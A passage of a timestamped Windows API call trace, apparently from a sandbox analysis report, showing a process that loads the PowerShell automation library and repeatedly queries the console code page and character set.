lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5c8df10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.200] GetLastError () returned 0xcb [0053.276] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0053.276] GetLastError () returned 0xcb [0053.277] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5c8e470 | out: lpConsoleScreenBufferInfo=0x5c8e470) returned 1 [0053.277] GetLastError () returned 0xcb [0053.288] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.288] GetLastError () returned 0xcb [0053.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5c8df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.295] GetLastError () returned 0xcb [0053.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5c8df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.295] GetLastError () returned 0xcb [0053.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5c8df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.295] GetLastError () returned 0xcb [0053.388] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.388] GetLastError () returned 0xcb [0053.445] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0053.445] GetLastError () returned 0xcb [0053.445] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x5c8eb84 | out: lpConsoleScreenBufferInfo=0x5c8eb84) returned 1 [0053.446] GetLastError () returned 0xcb [0053.449] GetConsoleOutputCP () returned 0x1b5 [0053.452] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eae0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eae0) returned 0 [0053.452] GetLastError () returned 0xcb [0053.452] GetConsoleOutputCP () returned 0x1b5 [0053.452] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eae0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eae0) returned 0 [0053.452] GetLastError () returned 0xcb [0053.452] GetConsoleOutputCP () returned 0x1b5 [0053.452] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.452] GetLastError () returned 0xcb [0053.452] GetConsoleOutputCP () returned 0x1b5 [0053.453] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.453] GetLastError () returned 0xcb [0053.453] GetConsoleOutputCP () returned 0x1b5 [0053.453] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.453] GetLastError () returned 0xcb [0053.453] GetConsoleOutputCP () returned 0x1b5 [0053.453] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.453] GetLastError () returned 0xcb [0053.453] GetConsoleOutputCP () returned 0x1b5 [0053.453] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.453] GetLastError () returned 0xcb [0053.453] GetConsoleOutputCP () returned 0x1b5 [0053.453] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.453] GetLastError () returned 0xcb [0053.453] GetConsoleOutputCP () returned 0x1b5 [0053.453] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.453] GetLastError () returned 0xcb [0053.453] GetConsoleOutputCP () returned 0x1b5 [0053.453] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.453] GetLastError () returned 0xcb [0053.453] GetConsoleOutputCP () returned 0x1b5 [0053.454] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.454] GetLastError () returned 0xcb [0053.454] GetConsoleOutputCP () returned 0x1b5 [0053.454] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.454] GetLastError () returned 0xcb [0053.454] GetConsoleOutputCP () returned 0x1b5 [0053.454] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.454] GetLastError () returned 0xcb [0053.454] GetConsoleOutputCP () returned 0x1b5 [0053.454] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.454] GetLastError () returned 0xcb [0053.454] GetConsoleOutputCP () returned 0x1b5 [0053.454] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.454] GetLastError () returned 0xcb [0053.454] GetConsoleOutputCP () returned 0x1b5 [0053.454] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.454] GetLastError () returned 0xcb [0053.454] GetConsoleOutputCP () returned 0x1b5 [0053.455] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.455] GetLastError () returned 0xcb [0053.455] GetConsoleOutputCP () returned 0x1b5 [0053.455] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.455] GetLastError () returned 0xcb [0053.455] GetConsoleOutputCP () returned 0x1b5 [0053.455] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.455] GetLastError () returned 0xcb [0053.455] GetConsoleOutputCP () returned 0x1b5 [0053.455] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.455] GetLastError () returned 0xcb [0053.455] GetConsoleOutputCP () returned 0x1b5 [0053.455] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.455] GetLastError () returned 0xcb [0053.455] GetConsoleOutputCP () returned 0x1b5 [0053.455] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.455] GetLastError () returned 0xcb [0053.455] GetConsoleOutputCP () returned 0x1b5 [0053.455] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.456] GetLastError () returned 0xcb [0053.456] GetConsoleOutputCP () returned 0x1b5 [0053.456] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.456] GetLastError () returned 0xcb [0053.456] GetConsoleOutputCP () returned 0x1b5 [0053.456] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.456] GetLastError () returned 0xcb [0053.456] GetConsoleOutputCP () returned 0x1b5 [0053.456] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.456] GetLastError () returned 0xcb [0053.456] GetConsoleOutputCP () returned 0x1b5 [0053.456] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.456] GetLastError () returned 0xcb [0053.456] GetConsoleOutputCP () returned 0x1b5 [0053.457] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.457] GetLastError () returned 0xcb [0053.457] GetConsoleOutputCP () returned 0x1b5 [0053.457] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.457] GetLastError () returned 0xcb [0053.457] GetConsoleOutputCP () returned 0x1b5 [0053.457] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.457] GetLastError () returned 0xcb [0053.457] GetConsoleOutputCP () returned 0x1b5 [0053.457] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.457] GetLastError () returned 0xcb [0053.457] GetConsoleOutputCP () returned 0x1b5 [0053.457] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.457] GetLastError () returned 0xcb [0053.457] GetConsoleOutputCP () returned 0x1b5 [0053.457] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.457] GetLastError () returned 0xcb [0053.457] GetConsoleOutputCP () returned 0x1b5 [0053.457] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.457] GetLastError () returned 0xcb [0053.458] GetConsoleOutputCP () returned 0x1b5 [0053.458] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.458] GetLastError () returned 0xcb [0053.458] GetConsoleOutputCP () returned 0x1b5 [0053.458] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.458] GetLastError () returned 0xcb [0053.458] GetConsoleOutputCP () returned 0x1b5 [0053.458] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.458] GetLastError () returned 0xcb [0053.458] GetConsoleOutputCP () returned 0x1b5 [0053.458] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.458] GetLastError () returned 0xcb [0053.458] GetConsoleOutputCP () returned 0x1b5 [0053.458] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.458] GetLastError () returned 0xcb [0053.458] GetConsoleOutputCP () returned 0x1b5 [0053.458] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.458] GetLastError () returned 0xcb [0053.458] GetConsoleOutputCP () returned 0x1b5 [0053.459] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.459] GetLastError () returned 0xcb [0053.459] GetConsoleOutputCP () returned 0x1b5 [0053.459] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.459] GetLastError () returned 0xcb [0053.459] GetConsoleOutputCP () returned 0x1b5 [0053.459] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.459] GetLastError () returned 0xcb [0053.459] GetConsoleOutputCP () returned 0x1b5 [0053.459] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.459] GetLastError () returned 0xcb [0053.459] GetConsoleOutputCP () returned 0x1b5 [0053.459] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.459] GetLastError () returned 0xcb [0053.459] GetConsoleOutputCP () returned 0x1b5 [0053.460] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.460] GetLastError () returned 0xcb [0053.460] GetConsoleOutputCP () returned 0x1b5 [0053.460] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.460] GetLastError () returned 0xcb [0053.460] GetConsoleOutputCP () returned 0x1b5 [0053.460] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.460] GetLastError () returned 0xcb [0053.460] GetConsoleOutputCP () returned 0x1b5 [0053.460] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.460] GetLastError () returned 0xcb [0053.460] GetConsoleOutputCP () returned 0x1b5 [0053.460] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.460] GetLastError () returned 0xcb [0053.460] GetConsoleOutputCP () returned 0x1b5 [0053.460] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.460] GetLastError () returned 0xcb [0053.460] GetConsoleOutputCP () returned 0x1b5 [0053.460] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.460] GetLastError () returned 0xcb [0053.460] GetConsoleOutputCP () returned 0x1b5 [0053.461] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.461] GetLastError () returned 0xcb [0053.461] GetConsoleOutputCP () returned 0x1b5 [0053.461] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.461] GetLastError () returned 0xcb [0053.461] GetConsoleOutputCP () returned 0x1b5 [0053.461] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.461] GetLastError () returned 0xcb [0053.461] GetConsoleOutputCP () returned 0x1b5 [0053.461] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.461] GetLastError () returned 0xcb [0053.461] GetConsoleOutputCP () returned 0x1b5 [0053.461] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.461] GetLastError () returned 0xcb [0053.461] GetConsoleOutputCP () returned 0x1b5 [0053.461] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.461] GetLastError () returned 0xcb [0053.461] GetConsoleOutputCP () returned 0x1b5 [0053.462] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.462] GetLastError () returned 0xcb [0053.462] GetConsoleOutputCP () returned 0x1b5 [0053.462] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.462] GetLastError () returned 0xcb [0053.462] GetConsoleOutputCP () returned 0x1b5 [0053.462] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.462] GetLastError () returned 0xcb [0053.462] GetConsoleOutputCP () returned 0x1b5 [0053.462] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.462] GetLastError () returned 0xcb [0053.462] GetConsoleOutputCP () returned 0x1b5 [0053.462] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.462] GetLastError () returned 0xcb [0053.462] GetConsoleOutputCP () returned 0x1b5 [0053.462] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.462] GetLastError () returned 0xcb [0053.462] GetConsoleOutputCP () returned 0x1b5 [0053.462] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.462] GetLastError () returned 0xcb [0053.462] GetConsoleOutputCP () returned 0x1b5 [0053.463] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.463] GetLastError () returned 0xcb [0053.463] GetConsoleOutputCP () returned 0x1b5 [0053.463] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.463] GetLastError () returned 0xcb [0053.463] GetConsoleOutputCP () returned 0x1b5 [0053.463] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.463] GetLastError () returned 0xcb [0053.463] GetConsoleOutputCP () returned 0x1b5 [0053.463] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.463] GetLastError () returned 0xcb [0053.463] GetConsoleOutputCP () returned 0x1b5 [0053.463] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.463] GetLastError () returned 0xcb [0053.463] GetConsoleOutputCP () returned 0x1b5 [0053.463] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.463] GetLastError () returned 0xcb [0053.463] GetConsoleOutputCP () returned 0x1b5 [0053.464] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.464] GetLastError () returned 0xcb [0053.464] GetConsoleOutputCP () returned 0x1b5 [0053.464] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.464] GetLastError () returned 0xcb [0053.464] GetConsoleOutputCP () returned 0x1b5 [0053.464] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.464] GetLastError () returned 0xcb [0053.464] GetConsoleOutputCP () returned 0x1b5 [0053.464] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.464] GetLastError () returned 0xcb [0053.464] GetConsoleOutputCP () returned 0x1b5 [0053.464] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.464] GetLastError () returned 0xcb [0053.464] GetConsoleOutputCP () returned 0x1b5 [0053.464] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.464] GetLastError () returned 0xcb [0053.464] GetConsoleOutputCP () returned 0x1b5 [0053.464] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.464] GetLastError () returned 0xcb [0053.464] GetConsoleOutputCP () returned 0x1b5 [0053.465] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.465] GetLastError () returned 0xcb [0053.465] GetConsoleOutputCP () returned 0x1b5 [0053.465] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.465] GetLastError () returned 0xcb [0053.465] GetConsoleOutputCP () returned 0x1b5 [0053.465] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.465] GetLastError () returned 0xcb [0053.465] GetConsoleOutputCP () returned 0x1b5 [0053.465] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eae0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eae0) returned 0 [0053.465] GetLastError () returned 0xcb [0053.465] GetConsoleOutputCP () returned 0x1b5 [0053.465] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.465] GetLastError () returned 0xcb [0053.465] GetConsoleOutputCP () returned 0x1b5 [0053.465] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.465] GetLastError () returned 0xcb [0053.465] GetConsoleOutputCP () returned 0x1b5 [0053.465] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.466] GetLastError () returned 0xcb [0053.466] GetConsoleOutputCP () returned 0x1b5 [0053.466] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.466] GetLastError () returned 0xcb [0053.466] GetConsoleOutputCP () returned 0x1b5 [0053.466] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.466] GetLastError () returned 0xcb [0053.466] GetConsoleOutputCP () returned 0x1b5 [0053.466] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.466] GetLastError () returned 0xcb [0053.466] GetConsoleOutputCP () returned 0x1b5 [0053.466] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.466] GetLastError () returned 0xcb [0053.466] GetConsoleOutputCP () returned 0x1b5 [0053.466] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.466] GetLastError () returned 0xcb [0053.466] GetConsoleOutputCP () returned 0x1b5 [0053.466] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.466] GetLastError () returned 0xcb [0053.466] GetConsoleOutputCP () returned 0x1b5 [0053.467] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.467] GetLastError () returned 0xcb [0053.467] GetConsoleOutputCP () returned 0x1b5 [0053.467] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.467] GetLastError () returned 0xcb [0053.467] GetConsoleOutputCP () returned 0x1b5 [0053.467] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.467] GetLastError () returned 0xcb [0053.467] GetConsoleOutputCP () returned 0x1b5 [0053.467] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.467] GetLastError () returned 0xcb [0053.467] GetConsoleOutputCP () returned 0x1b5 [0053.467] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.467] GetLastError () returned 0xcb [0053.467] GetConsoleOutputCP () returned 0x1b5 [0053.467] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.467] GetLastError () returned 0xcb [0053.467] GetConsoleOutputCP () returned 0x1b5 [0053.467] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5c8eac0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5c8eac0) returned 0 [0053.467] GetLastError () returned 0xcb [0053.468] GetConsoleOutputCP () returned 